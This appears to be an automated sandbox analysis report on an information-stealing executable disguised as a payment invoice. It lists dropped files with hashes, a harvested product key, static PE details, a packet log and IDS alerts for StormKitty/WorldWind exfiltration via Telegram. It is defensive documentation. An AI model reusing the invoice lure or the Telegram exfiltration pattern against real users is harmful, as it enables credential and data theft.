Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	20005
Entropy (8bit):	5.728864095485969
Encrypted:	false
SSDEEP:	192:SxnUEYAk+mcdmeqwNq0VZtEGYW1UqY1R2:EFTk+YVwNqPGYW1UqY18
MD5:	5308D1D8D9B0B057AFFFFADB3B01A338
SHA1:	B998E7800704BF8CC596DA6B24AE5147CB5977BC
SHA-256:	F4413489B31539C8DA99A68F536359ED21DD9B288B1B3A01D5FB5804BBE9B0E6
SHA-512:	828B1BA6B4B6AB0BD178B443F945DF31EE61DB31AE8C2065B15B2183DCBBB596BAF3CB41A168782B234AB902B98D1CE4FC4B760D0E550C712EB24B7109B389E1
Malicious:	false
Preview:	NAME: GanfXFlZgofsfbLqWVo..PID: 6464..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: GanfXFlZgofsfbLqWVo..PID: 5596..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: GanfXFlZgofsfbLqWVo..PID: 6724..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: C:\Windows\system32\svchost.exe..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\System32\svchost.exe..NAME: sihost..PID: 3420..EXE: C:\Windows\system32\sihost.exe..NAME: dllhost..PID: 5484..E

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	4.004364184708143
Encrypted:	false
SSDEEP:	3:FI60BBj:y60T
MD5:	52EBE27DECC6C4DF6A1A97BE0C1042BD
SHA1:	447887DA7FF110EE7C34FEA31EAAA516E518C20A
SHA-256:	96A4586A298AD718245D3422FDBCB0E4950C32BEAEA181C1F3F4E92976BC5F29
SHA-512:	BD7BB19FD8BFADD1578F44E75569B84C9603C22EEDACA317006431415D340C68A8A22C74E1F8FCC1B99A6B7A69225AFA8DDED319515E45B258F24E95915F6472
Malicious:	false
Preview:	PJN2F-JYTMH-R3M98-Y4FC8-8HPWK

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	15995
Entropy (8bit):	5.670741308345806
Encrypted:	false
SSDEEP:	96:OTzmPY8Q8dltBvCUyzqRBHCkMBVl5S0xXTJy7xxtuVrpjjarRWviJ8VUdcVyW9K6:MmRUH95
MD5:	80A9CF1DEF3358C3DDCBA99D8D76B87D
SHA1:	23BA24224F9F25BA2D92748646211369B9CFB886
SHA-256:	C3C776BC83C62B753BA34F29041E615437EC41E3D9656032DB886A56AAC43402
SHA-512:	88D6B4456B9484BCD0D0D6E42B592AF383EF3BF9F7F5BCF63389DB74A7AB88E3B328671534DED234794B5107B21C0BF03C3D129D634905964441FDE460625121
Malicious:	false
Preview:	NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6464..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 5596..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6724..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6844..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 6412..EXE: C:\Program Files (x86)\acDNjQhoJskYFVhnicHHAekUYpmdaRrSJoDMfyfTmfAixHegRyBMdYIRPQdX\GanfXFlZgofsfbLqWVo.exe..NAME: GanfXFlZgofsfbLqWVo..TITLE: New Tab - Google Chrome..PID: 5964..EXE: C:\Pr

C:\Users\user\AppData\Local\fd461059a48560022e2112c4763e94f5\user@932923_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	86201
Entropy (8bit):	7.853037273955941
Encrypted:	false
SSDEEP:	1536:CrPmU+oyiVAoUkXM5qyJ9Pw2k3YFh8BBfCNiXiNO1819iEI8/6jpCCCStcrCoslR:iPmU+oyi65qyI2kg8GNiXiNOq1Az8/Uj
MD5:	FBA206672AA76F3E6981F3827B30B668
SHA1:	9D271FD8975666BAE165A09812E59A8FC805C856
SHA-256:	147B938271AE35F55546B0D886E8F8325C7E60A059FF7DB157BA896E423A1240
SHA-512:	7EE558A049259764BD121B9C4662632F7C92D264BF320CEF0EEA66AD7C088179B62B2E2E46B41B34387A25ED716A4286FC07892B2E5A6A57AEDEC1464EAC20E6
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.*bi.F.xJ.5KC"...N...m.g....Uf.....?.2......Q.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..o.<-...OF.....j.#?........x..........#..........9.+..........e\.../n-.n.dh.c...k....1.q...y5..r..N.)W...O.d.QEw.!E.P11E-u>....k..V6....#..e...?)....^~a...b.y.}....G...1.%79.F.....W_.9Z+....]xW.._.1/...G.+.....+..&%........

C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	804352
Entropy (8bit):	7.642878120762314
Encrypted:	false
SSDEEP:	12288:5NMKhM39TXsTAiYRH3wbrccYpea/jiAsRaT21tKkxRzb53/x6Io5kZaiB:HMaciYlwkp5/o0i1tVRp6IfB
MD5:	54DBE54846A05D5A1677A5AB2970BD6A
SHA1:	4EA5792F72F540C58A54F5CFCE9DE19EB05FFAAA
SHA-256:	53965F472183C0E8EC94202B3BA0716FAF8E095E073A688F3396C4B8DCCA6F30
SHA-512:	F4778A6162B01BCFBB4D26B4686C9CAEA803B995B74D9F1C080EDA0A431820827DDD9601265C23C1220DE36FAEB75C5E3B738B8ADADF1CA76A5A350552B5BF4A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$Yg..............0.............~.... ........@.. ....................................@.................................,...O.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc...............D..............@..B................`.......H.......\|<..............f...x..........................................J.(.....s....}......0..J........{......(....o.....(.....r...p..(....o....}.....{.....{.....{.....io....&b.(.....s....}.....(......{.....{....o.....{....o.....{....o.....{....o....o....z.,..{....,..{....o......(......0...............(....s......s....}.....s....}.....s....}.....s....}.....s....}.....s....}.....s ...}.....s....}.....s....}.....(!....{.....o"....{.......rs#...o$....{........s%...o&....{.

C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.642878120762314
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Invoice-BL. Payment TT $ 28,945.99.exe
File size:	804'352 bytes
MD5:	54dbe54846a05d5a1677a5ab2970bd6a
SHA1:	4ea5792f72f540c58a54f5cfce9de19eb05ffaaa
SHA256:	53965f472183c0e8ec94202b3ba0716faf8e095e073a688f3396c4b8dcca6f30
SHA512:	f4778a6162b01bcfbb4d26b4686c9caea803b995b74d9f1c080eda0a431820827ddd9601265c23c1220de36faeb75c5e3b738b8adadf1ca76a5a350552b5bf4a
SSDEEP:	12288:5NMKhM39TXsTAiYRH3wbrccYpea/jiAsRaT21tKkxRzb53/x6Io5kZaiB:HMaciYlwkp5/o0i1tVRp6IfB
TLSH:	9005CFC07B26B702DE59B4708936EEB862582F38700878F27EEE3B5775B9152591CF06
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....$Yg..............0.............~.... ........@.. ....................................@................................

File Icon


Icon Hash:	83356d4d454d2986

Static PE Info

General

Entrypoint:	0x4bdf7e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675924A0 [Wed Dec 11 05:35:28 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FF16CE1E142h
je 00007FF16CE1E142h
add byte ptr [ebp+00h], ch
add byte ptr [edx+00h], dl
add byte ptr [esi+00h], ah
insb
add byte ptr [ebp+00h], ah
arpl word ptr [eax], ax
je 00007FF16CE1E142h
imul eax, dword ptr [eax], 006E006Fh
add byte ptr [ecx+00h], al
jnc 00007FF16CE1E142h
jnc 00007FF16CE1E142h
add byte ptr [ebp+00h], ch
bound eax, dword ptr [eax]
insb
add byte ptr [ecx+00h], bh
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
add byte ptr [edi+00h], ch
popad
add byte ptr [eax+eax+00h], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add eax, dword ptr [eax]
add eax, dword ptr [eax]
add byte ptr [eax], al
sub byte ptr [eax], al
add byte ptr [eax+0000000Eh], al
pushad
add byte ptr [eax], al
adc byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], 00000000h
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add eax, 00000100h
add byte ptr [eax+02800000h], bl
add byte ptr [eax], al
add byte ptr [eax+00000000h], dh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbdf2c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0x8088	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc8000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbbfc4	0xbc000	8f37f1614720af35d3ce64ed86dad0c5	False	0.8702106881648937	data	7.663019801526044	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbe000	0x8088	0x8200	3a519090a6c22cdf74e51e144548be7b	False	0.5292668269230769	data	6.344965839134589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc8000	0xc	0x200	f0900b24e04e34a5c5bfad83b5f15286	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xbe1d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5669 x 5669 px/m	0.36436170212765956
RT_ICON	0xbe640	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 5669 x 5669 px/m	0.24385245901639344
RT_ICON	0xbefc8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5669 x 5669 px/m	0.1845684803001876
RT_ICON	0xc0070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5669 x 5669 px/m	0.13526970954356846
RT_ICON	0xc2618	0x3750	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9771186440677966
RT_GROUP_ICON	0xc5d68	0x4c	data	0.75
RT_GROUP_ICON	0xc5db4	0x14	data	1.05
RT_VERSION	0xc5dc8	0x2be	data	0.4658119658119658

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T14:29:17.597583+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49743	149.154.167.220	443	TCP
2024-12-31T14:29:17.597583+0100	2031009	ET MALWARE StormKitty Data Exfil via Telegram	1	192.168.2.4	49743	149.154.167.220	443	TCP
2024-12-31T14:29:17.597583+0100	2044766	ET MALWARE WorldWind Stealer Checkin via Telegram (GET)	1	192.168.2.4	49743	149.154.167.220	443	TCP
2024-12-31T14:29:18.653042+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	149.154.167.220	443	TCP
2024-12-31T14:29:18.653042+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49744	149.154.167.220	443	TCP
2024-12-31T14:29:26.617368+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49748	149.154.167.220	443	TCP
2024-12-31T14:29:26.617368+0100	2031009	ET MALWARE StormKitty Data Exfil via Telegram	1	192.168.2.4	49748	149.154.167.220	443	TCP
2024-12-31T14:29:26.617368+0100	2044766	ET MALWARE WorldWind Stealer Checkin via Telegram (GET)	1	192.168.2.4	49748	149.154.167.220	443	TCP
2024-12-31T14:29:27.656433+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49750	149.154.167.220	443	TCP
2024-12-31T14:29:27.656433+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.4	49750	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 14:29:14.570225954 CET	49740	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:14.575026035 CET	80	49740	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:14.575084925 CET	49740	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:14.575835943 CET	49740	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:14.580692053 CET	80	49740	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:15.028290987 CET	80	49740	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:15.085304976 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:15.085347891 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:15.085496902 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:15.091808081 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:15.091825008 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:15.108058929 CET	49740	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:15.557826996 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:15.557888985 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:15.562046051 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:15.562055111 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:15.562274933 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:15.605849028 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:15.647366047 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:16.762460947 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:16.762516975 CET	443	49742	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:16.762579918 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:16.769108057 CET	49742	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:16.771539927 CET	49740	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:16.776671886 CET	80	49740	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:16.776752949 CET	49740	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:16.779247999 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:16.779270887 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:16.779473066 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:16.779810905 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:16.779824018 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.392261982 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.392332077 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.396769047 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.396776915 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.397160053 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.404860020 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.404892921 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.597624063 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.597685099 CET	443	49743	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.597731113 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.600486994 CET	49743	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.607716084 CET	49744	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.607753992 CET	443	49744	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:17.607832909 CET	49744	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.608108997 CET	49744	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:17.608122110 CET	443	49744	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:18.228800058 CET	443	49744	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:18.230528116 CET	49744	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:18.230551958 CET	443	49744	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:18.653064013 CET	443	49744	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:18.653120041 CET	443	49744	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:18.653234959 CET	49744	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:18.653754950 CET	49744	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:24.653423071 CET	49746	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:24.658340931 CET	80	49746	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:24.658409119 CET	49746	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:24.664386034 CET	49746	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:24.669178963 CET	80	49746	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:25.132405043 CET	80	49746	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:25.184372902 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.184413910 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.184508085 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.187774897 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.187787056 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.248708963 CET	49746	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:25.664819956 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.664917946 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.666337013 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.666343927 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.666546106 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.705034018 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.747337103 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.812388897 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.812442064 CET	443	49747	172.67.196.114	192.168.2.4
Dec 31, 2024 14:29:25.812499046 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.812946081 CET	49747	443	192.168.2.4	172.67.196.114
Dec 31, 2024 14:29:25.815679073 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:25.815720081 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:25.815829992 CET	49746	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:25.815860033 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:25.816116095 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:25.816132069 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:25.820830107 CET	80	49746	104.16.184.241	192.168.2.4
Dec 31, 2024 14:29:25.820882082 CET	49746	80	192.168.2.4	104.16.184.241
Dec 31, 2024 14:29:26.439418077 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.439482927 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.440792084 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.440800905 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.441000938 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.442337990 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.442369938 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.617410898 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.617456913 CET	443	49748	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.617506027 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.618047953 CET	49748	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.627298117 CET	49750	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.627337933 CET	443	49750	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:26.627437115 CET	49750	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.627715111 CET	49750	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:26.627727032 CET	443	49750	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:27.229168892 CET	443	49750	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:27.231137991 CET	49750	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:27.231163025 CET	443	49750	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:27.656450033 CET	443	49750	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:27.656510115 CET	443	49750	149.154.167.220	192.168.2.4
Dec 31, 2024 14:29:27.656686068 CET	49750	443	192.168.2.4	149.154.167.220
Dec 31, 2024 14:29:27.657104969 CET	49750	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 14:29:14.497584105 CET	59332	53	192.168.2.4	1.1.1.1
Dec 31, 2024 14:29:14.504638910 CET	53	59332	1.1.1.1	192.168.2.4
Dec 31, 2024 14:29:14.559030056 CET	61687	53	192.168.2.4	1.1.1.1
Dec 31, 2024 14:29:14.565747976 CET	53	61687	1.1.1.1	192.168.2.4
Dec 31, 2024 14:29:15.077294111 CET	59990	53	192.168.2.4	1.1.1.1
Dec 31, 2024 14:29:15.084583998 CET	53	59990	1.1.1.1	192.168.2.4
Dec 31, 2024 14:29:16.772052050 CET	63108	53	192.168.2.4	1.1.1.1
Dec 31, 2024 14:29:16.778772116 CET	53	63108	1.1.1.1	192.168.2.4
